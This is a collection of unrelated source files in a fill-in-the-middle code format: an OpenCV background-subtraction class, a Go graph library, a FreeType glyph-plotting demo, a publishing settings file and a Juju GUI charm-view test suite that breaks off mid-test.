<|file_name|>DPEigenbackgroundBGS.cpp<|end_file_name|><|fim▁begin|>#include "DPEigenbackgroundBGS.h" DPEigenbackgroundBGS::DPEigenbackgroundBGS() : firstTime(true), frameNumber(0), showOutput(true), threshold(225), historySize(20), embeddedDim(10) { std::cout << "DPEigenbackgroundBGS()" << std::endl; } DPEigenbackgroundBGS::~DPEigenbackgroundBGS() { std::cout << "~DPEigenbackgroundBGS()" << std::endl; } void DPEigenbackgroundBGS::process(const cv::Mat &img_input, cv::Mat &img_output) { if(img_input.empty()) return; loadConfig(); if(firstTime) saveConfig(); frame = new IplImage(img_input); if(firstTime) frame_data.ReleaseMemory(false); frame_data = frame; if(firstTime) { int width = img_input.size().width; int height = img_input.size().height; lowThresholdMask = cvCreateImage(cvSize(width, height), IPL_DEPTH_8U, 1); lowThresholdMask.Ptr()->origin = IPL_ORIGIN_BL; <|fim▁hole|> params.SetFrameSize(width, height); params.LowThreshold() = threshold; //15*15; params.HighThreshold() = 2*params.LowThreshold(); // Note: high threshold is used by post-processing //params.HistorySize() = 100; params.HistorySize() = historySize; //params.EmbeddedDim() = 20; params.EmbeddedDim() = embeddedDim; bgs.Initalize(params); bgs.InitModel(frame_data); } bgs.Subtract(frameNumber, frame_data, lowThresholdMask, highThresholdMask); lowThresholdMask.Clear(); bgs.Update(frameNumber, frame_data, lowThresholdMask); cv::Mat foreground(highThresholdMask.Ptr()); if(showOutput) cv::imshow("Eigenbackground (Oliver)", foreground); foreground.copyTo(img_output); delete frame; firstTime = false; frameNumber++; } void DPEigenbackgroundBGS::saveConfig() { CvFileStorage* fs = cvOpenFileStorage("./config/DPEigenbackgroundBGS.xml", 0, CV_STORAGE_WRITE); cvWriteInt(fs, "threshold", threshold); cvWriteInt(fs, "historySize", historySize); cvWriteInt(fs, "embeddedDim", embeddedDim); cvWriteInt(fs, "showOutput", showOutput); cvReleaseFileStorage(&fs); } void DPEigenbackgroundBGS::loadConfig() { CvFileStorage* fs = cvOpenFileStorage("./config/DPEigenbackgroundBGS.xml", 0, CV_STORAGE_READ); threshold = cvReadIntByName(fs, 0, "threshold", 225); historySize = cvReadIntByName(fs, 0, "historySize", 20); embeddedDim = cvReadIntByName(fs, 0, "embeddedDim", 10); showOutput = cvReadIntByName(fs, 0, "showOutput", true); cvReleaseFileStorage(&fs); }<|fim▁end|>
highThresholdMask = cvCreateImage(cvSize(width, height), IPL_DEPTH_8U, 1); highThresholdMask.Ptr()->origin = IPL_ORIGIN_BL;
<|file_name|>graph.go<|end_file_name|><|fim▁begin|>/* * Copyright (C) 2015 Red Hat, Inc. * * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. * */ package graph import ( "encoding/json" "errors" "fmt" "reflect" "strings" "sync" "time" "github.com/nu7hatch/gouuid" "github.com/skydive-project/skydive/common" "github.com/skydive-project/skydive/config" "github.com/skydive-project/skydive/filters" ) const ( maxEvents = 50 ) type graphEventType int const ( nodeUpdated graphEventType = iota + 1 nodeAdded nodeDeleted edgeUpdated edgeAdded edgeDeleted ) type Identifier string type GraphEventListener interface { OnNodeUpdated(n *Node) OnNodeAdded(n *Node) OnNodeDeleted(n *Node) OnEdgeUpdated(e *Edge) OnEdgeAdded(e *Edge) OnEdgeDeleted(e *Edge) } type graphEvent struct { kind graphEventType element interface{} listener GraphEventListener } type Metadata map[string]interface{} type MetadataTransaction struct { graph *Graph graphElement interface{} metadata Metadata } type graphElement struct { ID Identifier metadata Metadata host string createdAt time.Time deletedAt time.Time } type Node struct { graphElement } type Edge struct { graphElement parent Identifier child Identifier } type GraphBackend interface { AddNode(n *Node) bool DelNode(n *Node) bool GetNode(i Identifier, at *common.TimeSlice) []*Node GetNodeEdges(n *Node, at *common.TimeSlice, m Metadata) []*Edge AddEdge(e *Edge) bool DelEdge(e *Edge) bool GetEdge(i Identifier, at *common.TimeSlice) []*Edge GetEdgeNodes(e *Edge, at *common.TimeSlice, parentMetadata, childMetadata Metadata) ([]*Node, []*Node) AddMetadata(e interface{}, k string, v interface{}) bool SetMetadata(e interface{}, m Metadata) bool GetNodes(t *common.TimeSlice, m Metadata) []*Node GetEdges(t *common.TimeSlice, m Metadata) []*Edge WithContext(graph *Graph, context GraphContext) (*Graph, error) } type GraphContext struct { TimeSlice *common.TimeSlice } type Graph struct { sync.RWMutex backend GraphBackend context GraphContext host string eventListeners []GraphEventListener eventChan chan graphEvent eventConsumed bool currentEventListener GraphEventListener } type HostNodeTIDMap map[string][]string func BuildHostNodeTIDMap(nodes []*Node) HostNodeTIDMap { hnmap := make(HostNodeTIDMap) for _, node := range nodes { if host := node.Host(); host != "" { hnmap[host] = append(hnmap[host], string(node.ID)) } } return hnmap } // default implementation of a graph listener, can be used when not implementing // the whole set of callbacks type DefaultGraphListener struct { } func (d *DefaultGraphListener) OnNodeUpdated(n *Node) { } func (c *DefaultGraphListener) OnNodeAdded(n *Node) { } func (c *DefaultGraphListener) OnNodeDeleted(n *Node) { } func (c *DefaultGraphListener) OnEdgeUpdated(e *Edge) { } func (c *DefaultGraphListener) OnEdgeAdded(e *Edge) { } func (c *DefaultGraphListener) OnEdgeDeleted(e *Edge) { } func GenID() Identifier { u, _ := uuid.NewV4() return Identifier(u.String()) } func (m *Metadata) String() string { j, _ := json.Marshal(m) return string(j) } func (e *graphElement) Host() string { return e.host } func (e *graphElement) GetFieldInt64(field string) (_ int64, err error) { f, found := e.GetField(field) if !found { return 0, common.ErrFieldNotFound } return common.ToInt64(f) } func (e *graphElement) GetFieldString(field string) (_ string, err error) { f, found := e.GetField(field) if !found { return "", common.ErrFieldNotFound } s, ok := f.(string) if !ok { return "", common.ErrFieldNotFound } return s, nil } func (e *graphElement) GetField(name string) (interface{}, bool) { switch name { case "ID": return string(e.ID), true case "Host": return e.host, true case "CreatedAt": return e.createdAt.Unix(), true case "DeletedAt": return e.deletedAt.Unix(), true default: if strings.HasPrefix(name, "Metadata/") { name = name[9:] } v, ok := e.Metadata()[name] return v, ok } } func (e *graphElement) Metadata() Metadata { return e.metadata } func (e *graphElement) MatchMetadata(f Metadata) bool { for k, v := range f { switch v := v.(type) { case *filters.Filter: if !v.Eval(e) { return false } default: nv, ok := e.metadata[k] if !ok || !common.CrossTypeEqual(nv, v) { return false } } } return true } func (e *graphElement) String() string { deletedAt := "" if !e.deletedAt.IsZero() { deletedAt = e.deletedAt.String() } j, _ := json.Marshal(&struct { ID Identifier Metadata Metadata `json:",omitempty"` Host string CreatedAt string DeletedAt string `json:",omitempty"` }{ ID: e.ID, Metadata: e.metadata, Host: e.host, CreatedAt: e.createdAt.String(), DeletedAt: deletedAt, }) return string(j) } func parseTime(i interface{}) (t time.Time, err error) { var epoch int64 switch i := i.(type) { case int64: epoch = i case json.Number: epoch, err = i.Int64() if err != nil { return t, err } default: return t, fmt.Errorf("Invalid time: %+v", i) } return time.Unix(epoch, 0), err } func (e *graphElement) Decode(i interface{}) (err error) { objMap, ok := i.(map[string]interface{}) if !ok { return fmt.Errorf("Unable to decode graph element: %v, %+v", i, reflect.TypeOf(i)) } e.ID = Identifier(objMap["ID"].(string)) e.host = objMap["Host"].(string) if createdAt, ok := objMap["CreatedAt"]; ok { if e.createdAt, err = parseTime(createdAt); err != nil { return err } } if deletedAt, ok := objMap["DeletedAt"]; ok { if e.deletedAt, err = parseTime(deletedAt); err != nil { return err } } if m, ok := objMap["Metadata"]; ok { e.metadata = make(Metadata) for field, value := range m.(map[string]interface{}) { if n, ok := value.(json.Number); ok { if value, err = n.Int64(); err == nil { value = value.(int64) } else { value, _ = n.Float64() } } e.metadata[field] = value } } return nil } func (n *Node) MarshalJSON() ([]byte, error) { deletedAt := int64(0) if !n.deletedAt.IsZero() { deletedAt = n.deletedAt.Unix() } return json.Marshal(&struct { ID Identifier Metadata Metadata `json:",omitempty"` Host string CreatedAt int64 DeletedAt int64 `json:",omitempty"` }{ ID: n.ID, Metadata: n.metadata, Host: n.host, CreatedAt: n.createdAt.Unix(), DeletedAt: deletedAt, }) } func (n *Node) JsonRawMessage() *json.RawMessage { r, _ := n.MarshalJSON() raw := json.RawMessage(r) return &raw } func (n *Node) Decode(i interface{}) error { return n.graphElement.Decode(i) } func (e *Edge) GetFieldString(name string) (string, error) { switch name { case "Parent": return string(e.parent), nil case "Child": return string(e.child), nil default: return e.graphElement.GetFieldString(name) } } func (e *Edge) MarshalJSON() ([]byte, error) { deletedAt := int64(0) if !e.deletedAt.IsZero() { deletedAt = e.deletedAt.Unix() } return json.Marshal(&struct { ID Identifier Metadata Metadata `json:",omitempty"` Parent Identifier Child Identifier Host string CreatedAt int64 DeletedAt int64 `json:",omitempty"` }{ ID: e.ID, Metadata: e.metadata, Parent: e.parent, Child: e.child, Host: e.host, CreatedAt: e.createdAt.Unix(), DeletedAt: deletedAt, }) } func (e *Edge) JsonRawMessage() *json.RawMessage { r, _ := e.MarshalJSON() raw := json.RawMessage(r) return &raw } func (e *Edge) Decode(i interface{}) error { if err := e.graphElement.Decode(i); err != nil { return err } objMap := i.(map[string]interface{}) e.parent = Identifier(objMap["Parent"].(string)) e.child = Identifier(objMap["Child"].(string))<|fim▁hole|> return e.parent } func (e *Edge) GetChild() Identifier { return e.child } func (c *GraphContext) GetTimeSlice() *common.TimeSlice { return c.TimeSlice } func (g *Graph) SetMetadata(i interface{}, m Metadata) bool { var e *graphElement ge := graphEvent{element: i} switch i := i.(type) { case *Node: e = &i.graphElement ge.kind = nodeUpdated case *Edge: e = &i.graphElement ge.kind = edgeUpdated } if len(m) == len(e.metadata) { unchanged := true for k, v := range m { if e.metadata[k] != v { unchanged = false break } } if unchanged { return false } } if !g.backend.SetMetadata(i, m) { return false } e.metadata = m g.notifyEvent(ge) return true } func (g *Graph) AddMetadata(i interface{}, k string, v interface{}) bool { var e *graphElement ge := graphEvent{element: i} switch i.(type) { case *Node: e = &i.(*Node).graphElement ge.kind = nodeUpdated case *Edge: e = &i.(*Edge).graphElement ge.kind = edgeUpdated } if o, ok := e.metadata[k]; ok && o == v { return false } if !g.backend.AddMetadata(i, k, v) { return false } e.metadata[k] = v g.notifyEvent(ge) return true } func (g *Graph) DelMetadata(i interface{}, k string) bool { var m Metadata ge := graphEvent{element: i} switch i.(type) { case *Node: m = i.(*Node).graphElement.metadata ge.kind = nodeUpdated case *Edge: m = i.(*Edge).graphElement.metadata ge.kind = edgeUpdated } if _, ok := m[k]; !ok { return false } if !g.backend.SetMetadata(i, m) { return false } delete(m, k) g.notifyEvent(ge) return true } func (t *MetadataTransaction) AddMetadata(k string, v interface{}) { t.metadata[k] = v } func (t *MetadataTransaction) DelMetadata(k string, v interface{}) { delete(t.metadata, k) } func (t *MetadataTransaction) Metadata() Metadata { return t.metadata } func (t *MetadataTransaction) Commit() { var e graphElement ge := graphEvent{element: t.graphElement} switch t.graphElement.(type) { case *Node: e = t.graphElement.(*Node).graphElement ge.kind = nodeUpdated case *Edge: e = t.graphElement.(*Edge).graphElement ge.kind = edgeUpdated } updated := false for k, v := range t.metadata { if e.metadata[k] != v { e.metadata[k] = v if !t.graph.backend.AddMetadata(t.graphElement, k, v) { return } updated = true } } if updated { t.graph.notifyEvent(ge) } } func (g *Graph) StartMetadataTransaction(i interface{}) *MetadataTransaction { var e graphElement switch i.(type) { case *Node: e = i.(*Node).graphElement case *Edge: e = i.(*Edge).graphElement } t := MetadataTransaction{ graph: g, graphElement: i, metadata: make(Metadata), } for k, v := range e.metadata { t.metadata[k] = v } return &t } func (g *Graph) lookupShortestPath(n *Node, m Metadata, path []*Node, v map[Identifier]bool, em Metadata) []*Node { v[n.ID] = true newPath := make([]*Node, len(path)+1) copy(newPath, path) newPath[len(path)] = n if n.MatchMetadata(m) { return newPath } t := g.context.GetTimeSlice() shortest := []*Node{} for _, e := range g.backend.GetNodeEdges(n, t, em) { parents, children := g.backend.GetEdgeNodes(e, t, nil, nil) if len(parents) == 0 || len(children) == 0 { continue } parent, child := parents[0], children[0] var neighbor *Node if parent.ID != n.ID && !v[parent.ID] { neighbor = parent } if child.ID != n.ID && !v[child.ID] { neighbor = child } if neighbor != nil { nv := make(map[Identifier]bool) for k, v := range v { nv[k] = v } sub := g.lookupShortestPath(neighbor, m, newPath, nv, em) if len(sub) > 0 && (len(shortest) == 0 || len(sub) < len(shortest)) { shortest = sub } } } // check that the last element if the one we looked for if len(shortest) > 0 && !shortest[len(shortest)-1].MatchMetadata(m) { return []*Node{} } return shortest } func (g *Graph) LookupShortestPath(n *Node, m Metadata, em Metadata) []*Node { return g.lookupShortestPath(n, m, []*Node{}, make(map[Identifier]bool), em) } func (g *Graph) LookupParents(n *Node, f Metadata, em Metadata) (nodes []*Node) { t := g.context.GetTimeSlice() for _, e := range g.backend.GetNodeEdges(n, t, em) { if e.GetChild() == n.ID { parents, _ := g.backend.GetEdgeNodes(e, t, f, Metadata{}) for _, parent := range parents { nodes = append(nodes, parent) } } } return } func (g *Graph) LookupFirstChild(n *Node, f Metadata) *Node { nodes := g.LookupChildren(n, f, Metadata{}) if len(nodes) > 0 { return nodes[0] } return nil } func (g *Graph) LookupChildren(n *Node, f Metadata, em Metadata) (nodes []*Node) { t := g.context.GetTimeSlice() for _, e := range g.backend.GetNodeEdges(n, t, em) { if e.GetParent() == n.ID { _, children := g.backend.GetEdgeNodes(e, t, Metadata{}, f) for _, child := range children { nodes = append(nodes, child) } } } return nodes } func (g *Graph) AreLinked(n1 *Node, n2 *Node, m Metadata) bool { t := g.context.GetTimeSlice() for _, e := range g.backend.GetNodeEdges(n1, t, m) { parents, children := g.backend.GetEdgeNodes(e, t, Metadata{}, Metadata{}) if len(parents) == 0 || len(children) == 0 { continue } for i, parent := range parents { if children[i].ID == n2.ID || parent.ID == n2.ID { return true } } } return false } func (g *Graph) Link(n1 *Node, n2 *Node, m Metadata) *Edge { u, _ := uuid.NewV5(uuid.NamespaceOID, []byte(string(n1.ID)+string(n2.ID))) if len(m) > 0 { return g.NewEdge(Identifier(u.String()), n1, n2, m) } return g.NewEdge(Identifier(u.String()), n1, n2, nil) } func (g *Graph) Unlink(n1 *Node, n2 *Node) { for _, e := range g.backend.GetNodeEdges(n1, nil, Metadata{}) { parents, children := g.backend.GetEdgeNodes(e, nil, Metadata{}, Metadata{}) if len(parents) == 0 || len(children) == 0 { continue } parent, child := parents[0], children[0] if child.ID == n2.ID || parent.ID == n2.ID { g.DelEdge(e) } } } func (g *Graph) Replace(o *Node, n *Node) *Node { for _, e := range g.backend.GetNodeEdges(o, nil, Metadata{}) { parents, children := g.backend.GetEdgeNodes(e, nil, Metadata{}, Metadata{}) if len(parents) == 0 || len(children) == 0 { continue } parent, child := parents[0], children[0] g.DelEdge(e) if parent.ID == n.ID { g.Link(n, child, e.metadata) } else { g.Link(parent, n, e.metadata) } } n.metadata = o.metadata g.notifyEvent(graphEvent{element: n, kind: nodeUpdated}) g.DelNode(o) return n } func (g *Graph) LookupFirstNode(m Metadata) *Node { nodes := g.GetNodes(m) if len(nodes) > 0 { return nodes[0] } return nil } func (g *Graph) AddEdge(e *Edge) bool { if !g.backend.AddEdge(e) { return false } g.notifyEvent(graphEvent{element: e, kind: edgeAdded}) return true } func (g *Graph) GetEdge(i Identifier) *Edge { if edges := g.backend.GetEdge(i, g.context.GetTimeSlice()); len(edges) != 0 { return edges[0] } return nil } func (g *Graph) AddNode(n *Node) bool { if !g.backend.AddNode(n) { return false } g.notifyEvent(graphEvent{element: n, kind: nodeAdded}) return true } func (g *Graph) GetNode(i Identifier) *Node { if nodes := g.backend.GetNode(i, g.context.GetTimeSlice()); len(nodes) != 0 { return nodes[0] } return nil } func (g *Graph) NewNode(i Identifier, m Metadata, h ...string) *Node { hostname := g.host if len(h) > 0 { hostname = h[0] } n := &Node{ graphElement: graphElement{ ID: i, host: hostname, createdAt: time.Now().UTC(), }, } if m != nil { n.metadata = m } else { n.metadata = make(Metadata) } if !g.AddNode(n) { return nil } return n } func (g *Graph) NewEdge(i Identifier, p *Node, c *Node, m Metadata) *Edge { e := &Edge{ parent: p.ID, child: c.ID, graphElement: graphElement{ ID: i, host: g.host, createdAt: time.Now().UTC(), }, } if m != nil { e.metadata = m } else { e.metadata = make(Metadata) } if !g.AddEdge(e) { return nil } return e } func (g *Graph) DelEdge(e *Edge) { if g.backend.DelEdge(e) { e.deletedAt = time.Now().UTC() g.notifyEvent(graphEvent{element: e, kind: edgeDeleted}) } } func (g *Graph) DelNode(n *Node) { for _, e := range g.backend.GetNodeEdges(n, nil, Metadata{}) { g.DelEdge(e) } if g.backend.DelNode(n) { n.deletedAt = time.Now().UTC() g.notifyEvent(graphEvent{element: n, kind: nodeDeleted}) } } func (g *Graph) DelHostGraph(host string) { for _, node := range g.GetNodes(Metadata{}) { if node.host == host { g.DelNode(node) } } } func (g *Graph) GetNodes(m Metadata) []*Node { return g.backend.GetNodes(g.context.GetTimeSlice(), m) } func (g *Graph) GetEdges(m Metadata) []*Edge { return g.backend.GetEdges(g.context.GetTimeSlice(), m) } func (g *Graph) GetEdgeNodes(e *Edge, parentMetadata, childMetadata Metadata) ([]*Node, []*Node) { return g.backend.GetEdgeNodes(e, g.context.GetTimeSlice(), parentMetadata, childMetadata) } func (g *Graph) GetNodeEdges(n *Node, m Metadata) []*Edge { return g.backend.GetNodeEdges(n, g.context.GetTimeSlice(), m) } func (g *Graph) String() string { j, _ := json.Marshal(g) return string(j) } func (g *Graph) MarshalJSON() ([]byte, error) { return json.Marshal(&struct { Nodes []*Node Edges []*Edge }{ Nodes: g.GetNodes(Metadata{}), Edges: g.GetEdges(Metadata{}), }) } func (g *Graph) notifyEvent(ge graphEvent) { // push event to chan so that nested notification will be sent in the // right order. Assiociate the event with the current event listener so // we can avoid loop by not triggering event for the current listener. ge.listener = g.currentEventListener g.eventChan <- ge // already a consumer no need to run another consumer if g.eventConsumed { return } g.eventConsumed = true for len(g.eventChan) > 0 { ge = <-g.eventChan // notify only once per listener as if more than once we are in a recursion // and we wont to notify a listener which generated a graph element for _, g.currentEventListener = range g.eventListeners { // do not notify the listener which generated the event if g.currentEventListener == ge.listener { continue } switch ge.kind { case nodeAdded: g.currentEventListener.OnNodeAdded(ge.element.(*Node)) case nodeUpdated: g.currentEventListener.OnNodeUpdated(ge.element.(*Node)) case nodeDeleted: g.currentEventListener.OnNodeDeleted(ge.element.(*Node)) case edgeAdded: g.currentEventListener.OnEdgeAdded(ge.element.(*Edge)) case edgeUpdated: g.currentEventListener.OnEdgeUpdated(ge.element.(*Edge)) case edgeDeleted: g.currentEventListener.OnEdgeDeleted(ge.element.(*Edge)) } } } g.currentEventListener = nil g.eventConsumed = false } func (g *Graph) AddEventListener(l GraphEventListener) { g.Lock() defer g.Unlock() g.eventListeners = append(g.eventListeners, l) } func (g *Graph) RemoveEventListener(l GraphEventListener) { g.Lock() defer g.Unlock() for i, el := range g.eventListeners { if l == el { g.eventListeners = append(g.eventListeners[:i], g.eventListeners[i+1:]...) break } } } func (g *Graph) WithContext(c GraphContext) (*Graph, error) { return g.backend.WithContext(g, c) } func (g *Graph) GetContext() GraphContext { return g.context } func (g *Graph) GetHost() string { return g.host } func NewGraph(host string, backend GraphBackend) *Graph { return &Graph{ backend: backend, host: host, context: GraphContext{}, eventChan: make(chan graphEvent, maxEvents), } } func NewGraphFromConfig(backend GraphBackend) *Graph { host := config.GetConfig().GetString("host_id") return NewGraph(host, backend) } func NewGraphWithContext(hostID string, backend GraphBackend, context GraphContext) (*Graph, error) { graph := NewGraph(hostID, backend) return graph.WithContext(context) } func BackendFromConfig() (backend GraphBackend, err error) { name := config.GetConfig().GetString("graph.backend") if len(name) == 0 { name = "memory" } switch name { case "memory": backend, err = NewMemoryBackend() case "orientdb": backend, err = NewOrientDBBackendFromConfig() case "elasticsearch": backend, err = NewElasticSearchBackendFromConfig() default: return nil, errors.New("Config file is misconfigured, graph backend unknown: " + name) } if err != nil { return nil, err } return backend, nil }<|fim▁end|>
return nil } func (e *Edge) GetParent() Identifier {
<|file_name|>glyph-vector.py<|end_file_name|><|fim▁begin|># ----------------------------------------------------------------------------- # # FreeType high-level python API - Copyright 2011 Nicolas P. Rougier # Distributed under the terms of the new BSD license. # # ----------------------------------------------------------------------------- ''' Show how to access glyph outline description. ''' from freetype import * if __name__ == '__main__': import numpy import matplotlib.pyplot as plt from matplotlib.path import Path import matplotlib.patches as patches face = Face(b'./Vera.ttf') face.set_char_size( 48*64 ) face.load_char('S') slot = face.glyph outline = slot.outline points = numpy.array(outline.points, dtype=[('x',float), ('y',float)]) x, y = points['x'], points['y'] figure = plt.figure(figsize=(8,10)) axis = figure.add_subplot(111) #axis.scatter(points['x'], points['y'], alpha=.25) start, end = 0, 0 VERTS, CODES = [], [] # Iterate over each contour for i in range(len(outline.contours)): end = outline.contours[i] points = outline.points[start:end+1] points.append(points[0]) tags = outline.tags[start:end+1] tags.append(tags[0]) segments = [ [points[0],], ] for j in range(1, len(points) ): segments[-1].append(points[j]) if tags[j] & (1 << 0) and j < (len(points)-1): segments.append( [points[j],] ) verts = [points[0], ] codes = [Path.MOVETO,] for segment in segments: if len(segment) == 2: verts.extend(segment[1:]) codes.extend([Path.LINETO]) elif len(segment) == 3: verts.extend(segment[1:]) codes.extend([Path.CURVE3, Path.CURVE3]) else: verts.append(segment[1]) codes.append(Path.CURVE3) for i in range(1,len(segment)-2): A,B = segment[i], segment[i+1] C = ((A[0]+B[0])/2.0, (A[1]+B[1])/2.0) verts.extend([ C, B ]) codes.extend([ Path.CURVE3, Path.CURVE3]) verts.append(segment[-1])<|fim▁hole|> # Draw glyph lines path = Path(VERTS, CODES) glyph = patches.PathPatch(path, facecolor='.75', lw=1) # Draw "control" lines for i, code in enumerate(CODES): if code == Path.CURVE3: CODES[i] = Path.LINETO path = Path(VERTS, CODES) patch = patches.PathPatch(path, ec='.5', fill=False, ls='dashed', lw=1 ) axis.add_patch(patch) axis.add_patch(glyph) axis.set_xlim(x.min()-100, x.max()+100) plt.xticks([]) axis.set_ylim(y.min()-100, y.max()+100) plt.yticks([]) plt.show()<|fim▁end|>
codes.append(Path.CURVE3) VERTS.extend(verts) CODES.extend(codes) start = end+1
<|file_name|>githubpages_settings.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*- """ Production settings file for project 'project' """ from project.settings import * <|fim▁hole|>SITE_DOMAIN = 'sveetch.github.io/Sveetoy' # Directory where all stuff will be builded PUBLISH_DIR = os.path.join(PROJECT_DIR, '../docs') # Path where will be moved all the static files, usually this is a directory in # the ``PUBLISH_DIR`` STATIC_DIR = os.path.join(PROJECT_DIR, PUBLISH_DIR, 'static')<|fim▁end|>
DEBUG = False
<|file_name|>test_browser_charm_details.js<|end_file_name|><|fim▁begin|><|fim▁hole|>environments within a graphical interface (https://launchpad.net/juju-gui). Copyright (C) 2012-2013 Canonical Ltd. This program is free software: you can redistribute it and/or modify it under the terms of the GNU Affero General Public License version 3, as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranties of MERCHANTABILITY, SATISFACTORY QUALITY, or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Affero General Public License for more details. You should have received a copy of the GNU Affero General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. */ 'use strict'; (function() { describe('Browser charm view', function() { var container, CharmView, cleanIconHelper, factory, models, node, utils, view, views, Y, testContainer; before(function(done) { Y = YUI(GlobalConfig).use( 'datatype-date', 'datatype-date-format', 'charmstore-api', 'json-stringify', 'juju-charm-models', 'juju-tests-utils', 'juju-tests-factory', 'node', 'node-event-simulate', 'subapp-browser-charmview', function(Y) { views = Y.namespace('juju.browser.views'); models = Y.namespace('juju.models'); utils = Y.namespace('juju-tests.utils'); factory = Y.namespace('juju-tests.factory'); CharmView = views.BrowserCharmView; cleanIconHelper = utils.stubCharmIconPath(); done(); }); }); beforeEach(function() { window.flags = {}; container = utils.makeContainer(this, 'container'); var testcontent = [ '<div id=testcontent><div class="bws-view-data">', '</div></div>' ].join(); Y.Node.create(testcontent).appendTo(container); // Mock out a dummy location for the Store used in view instances. window.juju_config = { charmworldURL: 'http://localhost' }; node = Y.one('#testcontent'); }); afterEach(function() { window.flags = {}; if (view) { view.destroy(); } if (testContainer) { testContainer.remove(true); } node.remove(true); delete window.juju_config; container.remove(true); }); after(function() { cleanIconHelper(); }); it('renders for inspector mode correctly', function() { var data = utils.loadFixture('data/browsercharm.json', true); // We don't want any files so we don't have to mock/load them. data.files = []; view = new CharmView({ entity: new models.Charm(data), container: utils.makeContainer(this), forInspector: true }); view.render(); assert.isNull(view.get('container').one('.heading')); // There is no 'related charms' tab to display. assert.equal(view.get('container').all('.related-charms').size(), 0); }); // Return the charm heading node included in the charm detail view. var makeHeading = function(context, is_subordinate) { var data = utils.loadFixture('data/browsercharm.json', true); // We don't want any files so we don't have to mock/load them. data.files = []; data.is_subordinate = is_subordinate; utils.makeContainer(context); view = new CharmView({ entity: new models.Charm(data), container: utils.makeContainer(context) }); view.render(); var heading = view.get('container').one('.header'); assert.isNotNull(heading); return heading; }; it('avoids showing the subordinate message for non-subordinate charms', function() { var heading = makeHeading(this, false); assert.notInclude(heading.getContent(), 'Subordinate charm'); }); it('shows the subordinate message if the charm is a subordinate', function() { var heading = makeHeading(this, true); assert.include(heading.getContent(), 'Subordinate charm'); }); it('renders local charms for inspector mode correctly', function() { var data = utils.loadFixture('data/browsercharm.json', true); // We don't want any files so we don't have to mock/load them. data.files = []; data.url = 'local:precise/apache2-10'; var charm = new models.Charm(data); charm.set('scheme', 'local'); view = new CharmView({ entity: charm, container: utils.makeContainer(this), forInspector: true }); view.render(); assert.isNull(view.get('container').one('.heading')); assert.isNull(view.get('container').one('#readme')); assert.isNull(view.get('container').one('#configuration')); assert.isNull(view.get('container').one('#code')); assert.isNull(view.get('container').one('#features')); }); it('has sharing links', function() { view = new CharmView({ entity: new models.Charm({ files: [ 'hooks/install', 'readme.rst' ], id: 'precise/wordpress', code_source: { location: 'lp:~foo'} }), container: utils.makeContainer(this), charmstore: factory.makeFakeCharmstore() }); view.render(); var links = container.all('#sharing a'); assert.equal(links.size(), 3); }); it('should be able to locate a readme file', function() { view = new CharmView({ entity: new models.Charm({ files: [ 'hooks/install', 'readme.rst' ], id: 'precise/ceph-9', code_source: { location: 'lp:~foo' } }) }); view._locateReadme().should.eql('readme.rst'); // Matches for caps as well. view.get('entity').set('files', [ 'hooks/install', 'README.md' ]); view._locateReadme().should.eql('README.md'); }); it('can generate source, bug, and revno links from its charm', function() { view = new CharmView({ entity: new models.Charm({ files: [ 'hooks/install', 'readme.rst' ], id: 'precise/ceph-9', name: 'ceph', code_source: { location: 'lp:~foo'} }) }); var url = view._getSourceLink( view.get('entity').get('code_source').location); assert.equal('http://bazaar.launchpad.net/~foo/files', url); assert.equal( 'http://bazaar.launchpad.net/~foo/revision/1', view._getRevnoLink(url, 1)); assert.equal( 'https://bugs.launchpad.net/charms/+source/ceph', view._getBugLink(view.get('entity').get('name'))); }); it('excludes source svg files from the source tab', function() { view = new CharmView({ entity: new models.Charm({ files: [ 'hooks/install', 'icon.svg', 'readme.rst' ], id: 'precise/ceph-9', code_source: { location: 'lp:~foo'} }), container: utils.makeContainer(this) }); view.render(); var options = Y.one('#code').all('select option'); assert.equal(options.size(), 3); assert.deepEqual( options.get('text'), ['Select --', 'readme.rst', 'hooks/install']); }); it('can generate useful display data for commits', function() { view = new CharmView({ entity: new models.Charm({ files: [ 'hooks/install', 'readme.rst' ], id: 'precise/ceph-9', code_source: { location: 'lp:~foo' } }) }); var revisions = [ { authors: [{ email: '[email protected]', name: 'John Doe' }], date: '2013-05-02T10:05:32Z', message: 'The fnord had too much fleem.', revno: 1 }, { authors: [{ email: '[email protected]', name: 'John Doe' }], date: '2013-05-02T10:05:45Z', message: 'Fnord needed more fleem.', revno: 2 } ]; var url = view._getSourceLink( view.get('entity').get('code_source').location); var commits = view._formatCommitsForHtml(revisions, url); assert.equal( 'http://bazaar.launchpad.net/~foo/revision/1', commits.first.revnoLink); assert.equal( 'http://bazaar.launchpad.net/~foo/revision/2', commits.remaining[0].revnoLink); }); it('should be able to display the readme content', function() { view = new CharmView({ activeTab: '#readme', entity: new models.Charm({ files: [ 'hooks/install', 'readme.rst' ], id: 'precise/ceph-9', code_source: { location: 'lp:~foo'} }), container: utils.makeContainer(this), charmstore: { getFile: function(url, filename, success, failure) { success({ target: { responseText: 'README content.' } }); } } }); view.render(); Y.one('#readme').get('text').should.eql('README content.'); }); // EVENTS it('should catch when the add control is clicked', function(done) { view = new CharmView({ activeTab: '#readme', entity: new models.Charm({ files: [ 'hooks/install' ], id: 'precise/ceph-9', code_source: { location: 'lp:~foo' } }), container: utils.makeContainer(this) }); // Hook up to the callback for the click event. view._addCharmEnvironment = function(ev) { ev.halt(); Y.one('#readme h3').get('text').should.eql('Charm has no README'); done(); }; view.render(); node.one('.charm .add').simulate('click'); }); it('_addCharmEnvironment displays the config panel', function(done) { var fakeStore = new Y.juju.charmstore.APIv4({ charmstoreURL: 'localhost/' }); view = new CharmView({ entity: new models.Charm({ files: [ 'hooks/install' ], id: 'precise/ceph-9', url: 'cs:precise/ceph-9', code_source: { location: 'lp:~foo' }, options: { configName: 'test' } }), container: utils.makeContainer(this), charmstore: fakeStore }); var fireStub = utils.makeStubMethod(view, 'fire'); 